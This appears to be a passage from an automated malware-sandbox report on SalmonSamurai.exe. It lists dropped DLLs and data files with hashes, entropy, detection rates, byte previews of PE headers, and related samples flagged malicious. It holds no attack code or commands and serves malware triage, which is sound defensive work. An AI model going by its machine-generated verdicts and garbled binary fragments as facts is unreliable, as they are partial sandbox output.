                                                                                                                                                                                                                                          SHA1:F49A46BA0E954E657AAED1C9019A53D194272B6A
                                                                                                                                                                                                                                          SHA-256:7353F25DC5CF84D09894E3E0461CEF0E56799ADBC617FCE37620CA67240B547D
                                                                                                                                                                                                                                          SHA-512:5ADCB00162F284C16EC78016D301FC11559DD0A781FFBEFF822DB22EFBED168B11D7E5586EA82388E9503B0C7D3740CF2A08E243877F5319202491C8A641C970
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                          • Filename: NativeApp_G5L1NHZZ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: AyqwnIUrcz.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: nanophanotool.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: 9VbeqQbgU4.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: 9VbeqQbgU4.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: ivySCI-5.6.3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          • Filename: ivySCI-5.6.3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|3..]...]...]..e\...]...\.5.]..e...]..wX...]..wY...]..e^...]..eX.y.]..eY...]..e]...]..eU./.]..e....]..e_...].Rich..].................PE..d...^.}`.........." ......8..........<).......................................K.....:FK...`A........................................`%G.x....(G.P.....J.@.....H.......J..%....J.....p.D.p....................S<.(...pR<.@............S<.(............................text.....8.......8................. ..`.rdata...F....8..P....8.............@..@.data...`....@G......@G.............@....pdata........H......@H.............@..@.rsrc...@.....J......@J.............@..@.reloc........J......PJ.............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):2883072
                                                                                                                                                                                                                                          Entropy (8bit):6.697367886822868
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:49152:YGJO72cNsdMZWfAn1fdmZMOqcQrGhjUHgNxGUwSCmmfYDJGz5SN3lzl3hSKqH:Jj8n1QqGCmmfIUz59t
                                                                                                                                                                                                                                          MD5:E096C168B79A56DED0DF1AA142D9F1DA
                                                                                                                                                                                                                                          SHA1:318F20DAB294A315BD935160E9417FB5B28300F5
                                                                                                                                                                                                                                          SHA-256:65CC75329D17EC264E7A2DB571EA55F918394241445EA64569A56C75D0CFDC60
                                                                                                                                                                                                                                          SHA-512:3DCCF6CE85EF7E75690A5851642F10BB5E6E1572E91E933BACB7FCBFE405B0412B94BA0E160C3BA8D68D2B9AFC1DA268F61C83DCCD6453D8C9470931EE900BFD
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." .....$#..................................................@B...........`A..........................................*.......*.(.............@...............B..3....).......................).(....R#.@............"*.P............................text....##......$#................. ..`.rdata..l....@#......(#.............@..@.data...x.....*.."....*.............@....pdata........@.......*.............@..@.00cfg..8.....A.......+.............@..@.gxfg....,....A.......+.............@..@.retplne......A.......+..................tls..........A.......+.............@..._RDATA..\.....A.......+.............@..@.reloc...3....B..4....+.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):10542048
                                                                                                                                                                                                                                          Entropy (8bit):6.277141340322909
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:98304:OKPBQYOo+ddlymOk25flQCUliXUxiG9Ha93Whla6ZGdnp/8k:OKPBhORjOhCliXUxiG9Ha93Whla6ZGrn
                                                                                                                                                                                                                                          MD5:D89CE8C00659D8E5D408C696EE087CE3
                                                                                                                                                                                                                                          SHA1:49FC8109960BE3BB32C06C3D1256CB66DDED19A8
                                                                                                                                                                                                                                          SHA-256:9DFBE0DAD5C7021CFE8DF7F52458C422CBC5BE9E16FF33EC90665BB1E3F182DE
                                                                                                                                                                                                                                          SHA-512:DB097CE3EB9E132D0444DF79B167A7DCB2DF31EFFBBD3DF72DA3D24AE2230CC5213C6DF5E575985A9918FBD0A6576E335B6EBC12B6258BC93FA205399DE64C37
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html .Q....B.......B...#...B.. $...B..p$...B...$...B...%...B..`P...C...P...C...Q..(C......<C.....OC......bC..@...uC.......C..P....C.......C.......C..p....C.. ....C.......C.......D..p... D.....3D..0...FD.....YD.....lD.......D......D..0....D.......D..p....D......D..@....D.......E......E..@...*E.....=E..P...NE......bE.....rE..@....E.......E.......E..P....E.......E......E..@....F.......F.....'F..0...7F..P...JF......aF......qF...G...F.. H...F..`K...F...K...F...L...F...-...F...c...G....'.'G....'.>G..@.'.UG..0.'.oG....'..G...!'..G...!'..G..P&'..G...)'..G..@*'..H..`.(..H...e).7H..0.).VH...)*.xH....*..H....*..H...P+..H...Y+..H...Z+..I...]+. I..`^+.9I.. .+.UI....+.lI....+..I..P.-..I...=...I.......I.......I.. ....J..p....J......-J..p...EJ......ZJ......rJ..`....J..@....J.......J.......J..0....J.......J.......J..0....K..@....K..../.2K...,/.GK..../.\K..
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):481280
                                                                                                                                                                                                                                          Entropy (8bit):6.330677392522242
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:F9L2FFtoVsruIzUEzUST6uHKw+BubaOQ74PlqF8:F9CGafznzUSTRY70I
                                                                                                                                                                                                                                          MD5:1EECFB04C4434F5A813C8F0C0C8F2C88
                                                                                                                                                                                                                                          SHA1:6DC3CA4B3F72E7FB33BA26FA488DE323EDB59ADD
                                                                                                                                                                                                                                          SHA-256:897CEB95FB164640DDD2426673997B5F6FC2619FD916B038B575A70A0682A706
                                                                                                                                                                                                                                          SHA-512:D7818A42A76508AC3150AEA8D4E168B2DB36F55F71983A177002086380A82E307624CFE37B01FFC3D7EB407485D182654D0D7C6A0C06CCAAE60666630469C7E0
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." .....$................................................................`A........................................00......F>..(.......x.... ...C..............0....(.......................'..(...@A..@...........pA...............................text....".......$.................. ..`.rdata.......@.......(..............@..@.data....L....... ..................@....pdata...C... ...D..................@..@.00cfg..8....p......................@..@.gxfg...`$.......&..................@..@.retplne.............>...................tls....!............@..............@..._RDATA..\............B..............@..@.rsrc...x............D..............@..@.reloc..0............J..............@..B................................................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):7625728
                                                                                                                                                                                                                                          Entropy (8bit):6.463180789552528
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:98304:U8qvGdDtslh+LD3ZDWfnSvBSDU5bPm3k89Ld3gsOMt/:JD3ZXJ7bPWLWsD/
                                                                                                                                                                                                                                          MD5:CBA2436016F7A2838588A52D5B6F30F1
                                                                                                                                                                                                                                          SHA1:81DDF44B3E122DFBEE1A2CD8D4544364F1A621A4
                                                                                                                                                                                                                                          SHA-256:BCB3A3D2FCA3C33FA3D1D5DC976AA913CDC8001DF8E64C2CD3D2C545245141BF
                                                                                                                                                                                                                                          SHA-512:D92A880B5F83C5AE10AE9A83E38A293BB0E8C7659DD6ECE162FC752D57C9FCDE8036B81B023CD9F0F4F32B95B06FD4C366E20301010354B6CB904398A3149A44
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." ......Z...........M......................................`u...........`A..........................................k.8.....l.d....pt.......q.lO............t......vk.....................huk.(.....Z.@.............l.......k.@....................text...e.Z.......Z................. ..`.rdata..l.....Z.......Z.............@..@.data.........m..|....m.............@....pdata..lO....q..P....q.............@..@.00cfg..8.....t......Ps.............@..@.gxfg....+....t..,...Rs.............@..@.retplne.....@t......~s..................tls....:....Pt.......s.............@..._RDATA..\....`t.......s.............@..@.rsrc........pt.......s.............@..@.reloc........t.......s.............@..B................................................................................................................................................................................
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):377708
                                                                                                                                                                                                                                          Entropy (8bit):5.4079285675542845
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:ebGJWQdLX/Wi6fR9a5DhZ2FQPnUGSBhjA636Zi2Jyn9Ybt5KXpgmLwSVxJsVxSjf:6GJW2bOi6fRmZ2OPnUThjA636Zi2Jynd
                                                                                                                                                                                                                                          MD5:7E51349EDC7E6AED122BFA00970FAB80
                                                                                                                                                                                                                                          SHA1:EB6DF68501ECCE2090E1AF5837B5F15AC3A775EB
                                                                                                                                                                                                                                          SHA-256:F528E698B164283872F76DF2233A47D7D41E1ABA980CE39F6B078E577FD14C97
                                                                                                                                                                                                                                          SHA-512:69DA19053EB95EEF7AB2A2D3F52CA765777BDF976E5862E8CEBBAA1D1CE84A7743F50695A3E82A296B2F610475ABB256844B6B9EB7A23A60B4A9FC4EAE40346D
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):613642
                                                                                                                                                                                                                                          Entropy (8bit):4.894733266944232
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:b3pIuPzq8xSTwO8sgjZz5E9VJAVtnuviQix30jH8+I:b3plq8xLO8zjZz5E9VJAVtSiQO
                                                                                                                                                                                                                                          MD5:2009647C3E7AED2C4C6577EE4C546E19
                                                                                                                                                                                                                                          SHA1:E2BBACF95EC3695DAAE34835A8095F19A782CBCF
                                                                                                                                                                                                                                          SHA-256:6D61E5189438F3728F082AD6F694060D7EE8E571DF71240DFD5B77045A62954E
                                                                                                                                                                                                                                          SHA-512:996474D73191F2D550C516ED7526C9E2828E2853FCFBE87CA69D8B1242EB0DEDF04030BBCA3E93236BBD967D39DE7F9477C73753AF263816FAF7D4371F363BA3
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):671738
                                                                                                                                                                                                                                          Entropy (8bit):4.903433286644294
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:gjptqBycpX8vYULIrmhkH+P5NNb++YTzgpPMgSENeX:BB2um5S++
                                                                                                                                                                                                                                          MD5:47A6D10B4112509852D4794229C0A03B
                                                                                                                                                                                                                                          SHA1:2FB49A0B07FBDF8D4CE51A7B5A7F711F47A34951
                                                                                                                                                                                                                                          SHA-256:857FE3AB766B60A8D82B7B6043137E3A7D9F5CFB8DDD942316452838C67D0495
                                                                                                                                                                                                                                          SHA-512:5F5B280261195B8894EFAE9DF2BECE41C6C6A72199D65BA633C30D50A579F95FA04916A30DB77831F517B22449196D364D6F70D10D6C5B435814184B3BCF1667
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):701716
                                                                                                                                                                                                                                          Entropy (8bit):4.66095894344634
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:7Od6KqVw2iILlY+dAs1aQUfjoaVV4FH2mFxvx35uKN3CuKb7szmV2Jfu64K+z5jG:KsKqJi6lY+dAs1aQU7yZx35uK4XQzQI9
                                                                                                                                                                                                                                          MD5:A19269683A6347E07C55325B9ECC03A4
                                                                                                                                                                                                                                          SHA1:D42989DAF1C11FCFFF0978A4FB18F55EC71630EC
                                                                                                                                                                                                                                          SHA-256:AD65351A240205E881EF5C4CF30AD1BC6B6E04414343583597086B62D48D8A24
                                                                                                                                                                                                                                          SHA-512:1660E487DF3F3F4EC1CEA81C73DCA0AB86AAF121252FBD54C7AC091A43D60E1AFD08535B082EFD7387C12616672E78AA52DDDFCA01F833ABEF244284482F2C76
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):904943
                                                                                                                                                                                                                                          Entropy (8bit):4.273773274227575
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:1536:wqf22AwWk+ADszaaH0PaMadiMNKVbVtQW01jilDouMGsW2uMBVr+9RU4yVS5PMxq:1zW/AMfafVoCp8YbkJBbdJ2DB5y0XlRB
                                                                                                                                                                                                                                          MD5:5CDD07FA357C846771058C2DB67EB13B
                                                                                                                                                                                                                                          SHA1:DEB87FC5C13DA03BE86F67526C44F144CC65F6F6
                                                                                                                                                                                                                                          SHA-256:01C830B0007B8CE6ACA46E26D812947C3DF818927B826F7D8C5FFD0008A32384
                                                                                                                                                                                                                                          SHA-512:2AC29A3AA3278BD9A8FE1BA28E87941F719B14FBF8B52E0B7DC9D66603C9C147B9496BF7BE4D9E3AA0231C024694EF102DCC094C80C42BE5D68D3894C488098C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):426906
                                                                                                                                                                                                                                          Entropy (8bit):5.400864409916039
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:+XnGrijIs3cSlFEYLCJBB43nbhjJSwmrwiwWzM1ldLbpuQ16BtryBBwIle3nei3X:iNV4ossMNu51hnW5CptA
                                                                                                                                                                                                                                          MD5:D259469E94F2ADF54380195555154518
                                                                                                                                                                                                                                          SHA1:D69060BBE8E765CA4DC1F7D7C04C3C53C44B8AB5
                                                                                                                                                                                                                                          SHA-256:F98B7442BEFC285398A5DD6A96740CBA31D2F5AADADD4D5551A05712D693029B
                                                                                                                                                                                                                                          SHA-512:D0BD0201ACF4F7DAA84E89AA484A3DEC7B6A942C3115486716593213BE548657AD702EF2BC1D3D95A4A56B0F6E7C33D5375F41D6A863E4CE528F2BD6A318240E
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):436202
                                                                                                                                                                                                                                          Entropy (8bit):5.843819816549512
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:U4ftEfqE2jv7ShUjBA59wjd558YAGKND9Gto8QV:U41HE2jjShqywjd558YAbNDcI
                                                                                                                                                                                                                                          MD5:04A680847C4A66AD9F0A88FB9FB1FC7B
                                                                                                                                                                                                                                          SHA1:2AFCDF4234A9644FB128B70182F5A3DF1EE05BE1
                                                                                                                                                                                                                                          SHA-256:1CC44C5FBE1C0525DF37C5B6267A677F79C9671F86EDA75B6FC13ABF5D5356EB
                                                                                                                                                                                                                                          SHA-512:3A8A409A3C34149A977DEA8A4CB0E0822281AED2B0A75B02479C95109D7D51F6FB2C2772CCF1486CA4296A0AC2212094098F5CE6A1265FA6A7EB941C0CFEF83E
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):396104
                                                                                                                                                                                                                                          Entropy (8bit):5.454826678090317
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:Q3rSn4RJ28687mlwlGXaJwZkqEb1Phv6VP5yarXGzOJixhd4/TWwS:eND/xqkqEO5nrFTq
                                                                                                                                                                                                                                          MD5:1A53D374B9C37F795A462AAC7A3F118F
                                                                                                                                                                                                                                          SHA1:154BE9CF05042ECED098A20FF52FA174798E1FEA
                                                                                                                                                                                                                                          SHA-256:D0C38EB889EE27D81183A0535762D8EF314F0FDEB90CCCA9176A0CE9AB09B820
                                                                                                                                                                                                                                          SHA-512:395279C9246BD30A0E45D775D9F9C36353BD11D9463282661C2ABD876BDB53BE9C9B617BB0C2186592CD154E9353EA39E3FEED6B21A07B6850AB8ECD57E1ED29
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):424277
                                                                                                                                                                                                                                          Entropy (8bit):5.503137231857292
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:TFigju3qg4wajEzUKnYm31SOmhqYl51gHNiOIkCJD:TFiecqg1aqHSOu599kCJD
                                                                                                                                                                                                                                          MD5:8E6654B89ED4C1DC02E1E2D06764805A
                                                                                                                                                                                                                                          SHA1:FF660BC85BB4A0FA3B2637050D2B2D1AECC37AD8
                                                                                                                                                                                                                                          SHA-256:61CBCE9A31858DDF70CC9B0C05FB09CE7032BFB8368A77533521722465C57475
                                                                                                                                                                                                                                          SHA-512:5AC71EDA16F07F3F2B939891EDA2969C443440350FD88AB3A9B3180B8B1A3ECB11E79E752CF201F21B3DBFBA00BCC2E4F796F347E6137A165C081E86D970EE61
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):769050
                                                                                                                                                                                                                                          Entropy (8bit):4.75072843480339
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:H/58dBquNw2202pgtZSWjZ4LIbsJvaP5A3HKQiEQBR07391qf2utKMaBlS9WffFR:H8BquNw2202pgtsWjyLrJvaRA3HtiEQG
                                                                                                                                                                                                                                          MD5:9528D21E8A3F5BAD7CA273999012EBE8
                                                                                                                                                                                                                                          SHA1:58CD673CE472F3F2F961CF8B69B0C8B8C01D457C
                                                                                                                                                                                                                                          SHA-256:E79C1E7A47250D88581E8E3BAF78DCAF31FE660B74A1E015BE0F4BAFDFD63E12
                                                                                                                                                                                                                                          SHA-512:165822C49CE0BDB82F3C3221E6725DAC70F53CFDAD722407A508FA29605BC669FB5E5070F825F02D830E0487B28925644438305372A366A3D60B55DA039633D7
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):344606
                                                                                                                                                                                                                                          Entropy (8bit):5.5169703217013675
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:80kjE55JcUnMP9egFXwqfaYnT9Xa5alSeBNdg:80kQJZnM1XwWT05YScg
                                                                                                                                                                                                                                          MD5:D59E613E8F17BDAFD00E0E31E1520D1F
                                                                                                                                                                                                                                          SHA1:529017D57C4EFED1D768AB52E5A2BC929FDFB97C
                                                                                                                                                                                                                                          SHA-256:90E585F101CF0BB77091A9A9A28812694CEE708421CE4908302BBD1BC24AC6FD
                                                                                                                                                                                                                                          SHA-512:29FF3D42E5D0229F3F17BC0ED6576C147D5C61CE2BD9A2E658A222B75D993230DE3CE35CA6B06F5AFA9EA44CFC67817A30A87F4FAF8DC3A5C883B6EE30F87210
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):347111
                                                                                                                                                                                                                                          Entropy (8bit):5.508989875739037
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:xiLqIY2MuZYLMMP9ecGmM8faYdY4K55TiSbn8vMwS:xiLqIp34MM+mM0Y55eSKMwS
                                                                                                                                                                                                                                          MD5:5E3813E616A101E4A169B05F40879A62
                                                                                                                                                                                                                                          SHA1:615E4D94F69625DDA81DFAEC7F14E9EE320A2884
                                                                                                                                                                                                                                          SHA-256:4D207C5C202C19C4DACA3FDDB2AE4F747F943A8FAF86A947EEF580E2F2AEE687
                                                                                                                                                                                                                                          SHA-512:764A271A9CFB674CCE41EE7AED0AD75F640CE869EFD3C865D1B2D046C9638F4E8D9863A386EBA098F5DCEDD20EA98BAD8BCA158B68EB4BDD606D683F31227594
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):421147
                                                                                                                                                                                                                                          Entropy (8bit):5.3798866108688905
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:34e5fql0vt1s9zjzVMY/6+yN9d8piKkGp2Ioiw/QbuOXV5blUB0GLF96RRIHKxgY:34e5Sktm92Yfhpjq+5wLF96oSdc4
                                                                                                                                                                                                                                          MD5:7F6696CC1E71F84D9EC24E9DC7BD6345
                                                                                                                                                                                                                                          SHA1:36C1C44404EE48FC742B79173F2C7699E1E0301F
                                                                                                                                                                                                                                          SHA-256:D1F17508F3A0106848C48A240D49A943130B14BD0FEB5ED7AE89605C7B7017D1
                                                                                                                                                                                                                                          SHA-512:B226F94F00978F87B7915004A13CDBD23DE2401A8AFAA2517498538967DF89B735F8ECC46870C92E3022CAC795218A60AD2B8FFF1EFAD9FEEA4EC193704A568A
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):421332
                                                                                                                                                                                                                                          Entropy (8bit):5.349883254359391
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:fILAyMcQXU0+/3IgsC5pN+v6Idj3J5Orj7FQoz7L66PZqS:ALAyNQCsupUv6gj3J5OrmoznGS
                                                                                                                                                                                                                                          MD5:A36992D320A88002697DA97CD6A4F251
                                                                                                                                                                                                                                          SHA1:C1F88F391A40CCF2B8A7B5689320C63D6D42935F
                                                                                                                                                                                                                                          SHA-256:C5566B661675B613D69A507CBF98768BC6305B80E6893DC59651A4BE4263F39D
                                                                                                                                                                                                                                          SHA-512:9719709229A4E8F63247B3EFE004ECFEB5127F5A885234A5F78EE2B368F9E6C44EB68A071E26086E02AA0E61798B7E7B9311D35725D3409FFC0E740F3AA3B9B5
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):380687
                                                                                                                                                                                                                                          Entropy (8bit):5.464870724176939
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:2Mg++J/xRN0JLnrC4HFJbT/RauiQ/G5LjR43f7LQkPQW:2MmJnq7DG5LjQ
                                                                                                                                                                                                                                          MD5:A94E1775F91EA8622F82AE5AB5BA6765
                                                                                                                                                                                                                                          SHA1:FF17ACCDD83AC7FCC630E9141E9114DA7DE16FDB
                                                                                                                                                                                                                                          SHA-256:1606B94AEF97047863481928624214B7E0EC2F1E34EC48A117965B928E009163
                                                                                                                                                                                                                                          SHA-512:A2575D2BD50494310E8EF9C77D6C1749420DFBE17A91D724984DF025C47601976AF7D971ECAE988C99723D53F240E1A6B3B7650A17F3B845E3DAEEFAAF9FE9B9
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):622184
                                                                                                                                                                                                                                          Entropy (8bit):5.029655615738747
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:Kxw5iX9nuyaXTfwHxwNUWGOGfStQEvy1zeItDmNtua/1wMTAKzIxRAQiHedNu36/:Kxw5YuyaXTfwRwNUWGOGfStQEvy1zeIR
                                                                                                                                                                                                                                          MD5:9D273AF70EAFD1B5D41F157DBFB94FDC
                                                                                                                                                                                                                                          SHA1:DA98BDE34B59976D4514FF518BD977A713EA4F2E
                                                                                                                                                                                                                                          SHA-256:319D1E20150D4E3F496309BA82FCE850E91378EE4B0C7119A003A510B14F878B
                                                                                                                                                                                                                                          SHA-512:0A892071BEA92CC7F1A914654BC4F9DA6B9C08E3CB29BB41E9094F6120DDC7A08A257C0D2B475C98E7CDCF604830E582CF2A538CC184056207F196FFC43F29AD
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):389118
                                                                                                                                                                                                                                          Entropy (8bit):5.427253181023048
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:nEbM+RtZ9eC6cMkohGZxGseSFOE/xaWEkLl5W5ucHiEi18OWUcrOShPGNgX1wL2:V+/upPgZxaS5W5xHiEi18OWUsU2
                                                                                                                                                                                                                                          MD5:D4B776267EFEBDCB279162C213F3DB22
                                                                                                                                                                                                                                          SHA1:7236108AF9E293C8341C17539AA3F0751000860A
                                                                                                                                                                                                                                          SHA-256:297E3647EAF9B3B95CF833D88239919E371E74CC345A2E48A5033EBE477CD54E
                                                                                                                                                                                                                                          SHA-512:1DC7D966D12E0104AACB300FD4E94A88587A347DB35AD2327A046EF833FB354FD9CBE31720B6476DB6C01CFCB90B4B98CE3CD995E816210B1438A13006624E8F
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):438088
                                                                                                                                                                                                                                          Entropy (8bit):5.195613019166525
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:2zHaVyEDQV5aZrU+5xeuhGjZ3ZmA58Pm+7JATvy8:2zNMdU4XA5Imb
                                                                                                                                                                                                                                          MD5:3165351C55E3408EAA7B661FA9DC8924
                                                                                                                                                                                                                                          SHA1:181BEE2A96D2F43D740B865F7E39A1BA06E2CA2B
                                                                                                                                                                                                                                          SHA-256:2630A9D5912C8EF023154C6A6FB5C56FAF610E1E960AF66ABEF533AF19B90CAA
                                                                                                                                                                                                                                          SHA-512:3B1944EA3CFCBE98D4CE390EA3A8FF1F6730EB8054E282869308EFE91A9DDCD118290568C1FC83BD80E8951C4E70A451E984C27B400F2BDE8053EA25B9620655
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):454982
                                                                                                                                                                                                                                          Entropy (8bit):5.385096169417585
